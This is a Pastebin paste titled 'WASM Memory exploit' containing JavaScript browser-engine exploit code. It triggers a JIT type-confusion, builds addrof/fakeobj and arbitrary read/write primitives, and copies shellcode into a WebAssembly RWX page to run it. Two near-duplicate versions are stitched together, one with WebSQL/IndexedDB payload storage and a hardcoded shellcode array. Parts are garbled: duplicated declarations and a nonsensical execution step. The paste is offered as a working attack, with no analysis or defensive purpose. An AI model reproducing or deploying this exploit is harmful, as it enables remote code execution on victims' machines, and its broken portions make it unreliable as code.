API tools faq
paste
Advertisement
xosski

WASM Memory exploit

xosski
Dec 28th, 2024
16
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.62 KB | None | 0 0
raw download clone embed print report
  1. var executableBuffer = new ArrayBuffer(0x1000);
  2. var dataView = new DataView(executableBuffer);
  3.  
  4. var buf = new ArrayBuffer(8);
  5. var f64_buf = new Float64Array(buf);
  6. var u64_buf = new Uint32Array(buf);
  7. let buf2 = new ArrayBuffer(0x150);
  8.  
  9. function initSQLDatabase() {
  10. let db = openDatabase('iu14D2N_SQL', '1.0', 'Memory Database', 2 * 1024 * 1024);
  11.  
  12. db.transaction(function (tx) {
  13. tx.executeSql('CREATE TABLE IF NOT EXISTS memory_dumps (addr TEXT, data TEXT)');
  14. tx.executeSql('CREATE TABLE IF NOT EXISTS shellcode (id TEXT, payload BLOB)');
  15. });
  16. return db;
  17. }
  18.  
  19. function ftoi(val) {
  20. f64_buf[0] = val;
  21. return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
  22. }
  23.  
  24. function itof(val) {
  25. u64_buf[0] = Number(val & 0xffffffffn);
  26. u64_buf[1] = Number(val >> 32n);
  27. return f64_buf[0];
  28. }
  29.  
  30. const _arr = new Uint32Array([2**31]);
  31.  
  32. function foo(a) {
  33. var x = 1;
  34. x = (_arr[0] ^ 0) + 1;
  35. x = Math.abs(x);
  36. x -= 2147483647;
  37. x = Math.max(x, 0);
  38. x -= 1;
  39. if(x==-1) x = 0;
  40. var arr = new Array(x);
  41. arr.shift();
  42. var cor = [1.1, 1.2, 1.3];
  43. return [arr, cor];
  44. }
  45.  
  46. function readMemoryRegion(startAddr, length) {
  47. let result = [];
  48. for(let i = 0n; i < BigInt(length); i++) {
  49. result.push(Number(arbread(startAddr + i)));
  50. }
  51. console.log("[+] Memory region read from", startAddr.toString(16));
  52. return result;
  53. }
  54.  
  55. function dumpMemoryRegion(addr, size) {
  56. let memData = [];
  57. for(let i = 0n; i < BigInt(size); i += 8n) {
  58. let value = arbread(addr + i);
  59. memData.push(value);
  60. }
  61. console.log("[+] Memory dump at", addr.toString(16), ":", memData);
  62. return memData;
  63. }
  64.  
  65. function dumpMemoryRegionToSQL(addr, size, db) {
  66. let memData = dumpMemoryRegion(addr, size);
  67. db.transaction(function (tx) {
  68. tx.executeSql('INSERT INTO memory_dumps (addr, data) VALUES (?, ?)',
  69. [addr.toString(16), JSON.stringify(memData)]);
  70. });
  71. return memData;
  72. }
  73.  
  74. function storeShellcode(db, shellcode) {
  75. db.transaction(function (tx) {
  76. tx.executeSql('INSERT INTO shellcode (id, payload) VALUES (?, ?)',
  77. ['iu14D2N_shellcode', shellcode]);
  78. });
  79. }
  80.  
  81. for(var i=0;i<0x3000;++i)
  82. foo(true);
  83.  
  84. var x = foo(false);
  85. var arr = x[0];
  86. var cor = x[1];
  87.  
  88. const idx = 6;
  89. arr[idx+10] = 0x4242;
  90.  
  91. function addrof(k) {
  92. arr[idx+1] = k;
  93. return ftoi(cor[0]) & 0xffffffffn;
  94. }
  95.  
  96. function fakeobj(k) {
  97. cor[0] = itof(k);
  98. return arr[idx+1];
  99. }
  100.  
  101. var float_array_map = ftoi(cor[3]);
  102.  
  103. var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
  104. var fake = fakeobj(addrof(arr2) + 0x20n);
  105.  
  106. function arbread(addr) {
  107. if (addr % 2n == 0) {
  108. addr += 1n;
  109. }
  110. arr2[1] = itof((2n << 32n) + addr - 8n);
  111. return (fake[0]);
  112. }
  113.  
  114. function arbwrite(addr, val) {
  115. if (addr % 2n == 0) {
  116. addr += 1n;
  117. }
  118. arr2[1] = itof((2n << 32n) + addr - 8n);
  119. fake[0] = itof(BigInt(val));
  120. }
  121.  
  122. function copy_shellcode(addr, shellcode) {
  123. let dataview = new DataView(buf2);
  124. let buf_addr = addrof(buf2);
  125. let backing_store_addr = buf_addr + 0x14n;
  126. arbwrite(backing_store_addr, addr);
  127.  
  128. for (let i = 0; i < shellcode.length; i++) {
  129. dataview.setUint32(4*i, shellcode[i], true);
  130. }
  131. }
  132.  
  133. async function executeExploit() {
  134. let db = initSQLDatabase();
  135. var exec_addr = addrof(executableBuffer) + 0x20n;
  136. console.log("[+] Address of executable region: " + exec_addr.toString(16));
  137.  
  138. dumpMemoryRegionToSQL(exec_addr, 0x100, db);
  139.  
  140. let shellcode = [
  141. 0x90909090,
  142. 0x68434241,
  143. 0x6A00,
  144. 0xB8,
  145. 0x89E5,
  146. 0x31C0,
  147. 0x50,
  148. 0x89E2,
  149. 0x31C9,
  150. 0xB0FF,
  151. 0xC3
  152. ];
  153.  
  154. storeShellcode(db, shellcode);
  155. copy_shellcode(exec_addr, shellcode);
  156.  
  157. let execFunc = new Function('return ' + exec_addr)();
  158. execFunc();
  159. }
  160.  
  161. async function executeCustomExploit() {
  162. console.log("[+] Starting iu14D2N exploit with SQL capabilities...");
  163. await executeExploit();
  164. console.log("[+] Exploit and SQL operations completed");
  165. }
  166.  
  167. executeCustomExploit().catch(error => {
  168. console.log("[!] Exploit failed:", error);
  169. });
  170. /////////////////////////////////////////////////////
  171. var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
  172. var wasm_mod = new WebAssembly.Module(wasm_code);
  173. var wasm_instance = new WebAssembly.Instance(wasm_mod);
  174. var f = wasm_instance.exports.main;
  175.  
  176. var buf = new ArrayBuffer(8);
  177. var f64_buf = new Float64Array(buf);
  178. var u64_buf = new Uint32Array(buf);
  179. let buf2 = new ArrayBuffer(0x150);
  180.  
  181. function ftoi(val) {
  182. f64_buf[0] = val;
  183. return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
  184. }
  185.  
  186. function itof(val) {
  187. u64_buf[0] = Number(val & 0xffffffffn);
  188. u64_buf[1] = Number(val >> 32n);
  189. return f64_buf[0];
  190. }
  191.  
  192. const _arr = new Uint32Array([2**31]);
  193.  
  194. function foo(a) {
  195. var x = 1;
  196. x = (_arr[0] ^ 0) + 1;
  197. x = Math.abs(x);
  198. x -= 2147483647;
  199. x = Math.max(x, 0);
  200. x -= 1;
  201. if(x==-1) x = 0;
  202. var arr = new Array(x);
  203. arr.shift();
  204. var cor = [1.1, 1.2, 1.3];
  205. return [arr, cor];
  206. }
  207.  
  208. async function loadShellcodeFromDB(dbName, tableName) {
  209. return new Promise((resolve, reject) => {
  210. let request = indexedDB.open(dbName, 1);
  211.  
  212. request.onupgradeneeded = (event) => {
  213. let db = event.target.result;
  214. if (!db.objectStoreNames.contains(tableName)) {
  215. db.createObjectStore(tableName, {keyPath: 'id'});
  216. }
  217. };
  218.  
  219. request.onerror = () => reject(request.error);
  220. request.onsuccess = () => {
  221. let db = request.result;
  222. let transaction = db.transaction(tableName, "readonly");
  223. let store = transaction.objectStore(tableName);
  224. let getRequest = store.get("shellcode");
  225.  
  226. getRequest.onsuccess = () => {
  227. if (getRequest.result) {
  228. resolve(getRequest.result.data);
  229. } else {
  230. resolve(null);
  231. }
  232. };
  233. };
  234. });
  235. }
  236.  
  237. for(var i=0;i<0x3000;++i)
  238. foo(true);
  239.  
  240. var x = foo(false);
  241. var arr = x[0];
  242. var cor = x[1];
  243.  
  244. const idx = 6;
  245. arr[idx+10] = 0x4242;
  246.  
  247. function addrof(k) {
  248. arr[idx+1] = k;
  249. return ftoi(cor[0]) & 0xffffffffn;
  250. }
  251.  
  252. function fakeobj(k) {
  253. cor[0] = itof(k);
  254. return arr[idx+1];
  255. }
  256.  
  257. var float_array_map = ftoi(cor[3]);
  258.  
  259. var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
  260. var fake = fakeobj(addrof(arr2) + 0x20n);
  261.  
  262. function arbread(addr) {
  263. if (addr % 2n == 0) {
  264. addr += 1n;
  265. }
  266. arr2[1] = itof((2n << 32n) + addr - 8n);
  267. return (fake[0]);
  268. }
  269.  
  270. function arbwrite(addr, val) {
  271. if (addr % 2n == 0) {
  272. addr += 1n;
  273. }
  274. arr2[1] = itof((2n << 32n) + addr - 8n);
  275. fake[0] = itof(BigInt(val));
  276. }
  277.  
  278. function copy_shellcode(addr, shellcode) {
  279. let dataview = new DataView(buf2);
  280. let buf_addr = addrof(buf2);
  281. let backing_store_addr = buf_addr + 0x14n;
  282. arbwrite(backing_store_addr, addr);
  283.  
  284. for (let i = 0; i < shellcode.length; i++) {
  285. dataview.setUint32(4*i, shellcode[i], true);
  286. }
  287. }
  288.  
  289. async function executeExploit() {
  290. var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
  291. console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
  292.  
  293. let shellcode = await loadShellcodeFromDB("exploitDB", "payloads");
  294. if (!shellcode) {
  295. shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
  296. }
  297.  
  298. copy_shellcode(rwx_page_addr, shellcode);
  299. f();
  300. }
  301.  
  302. // Initialize and execute
  303. executeExploit().catch(console.error);
  304.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!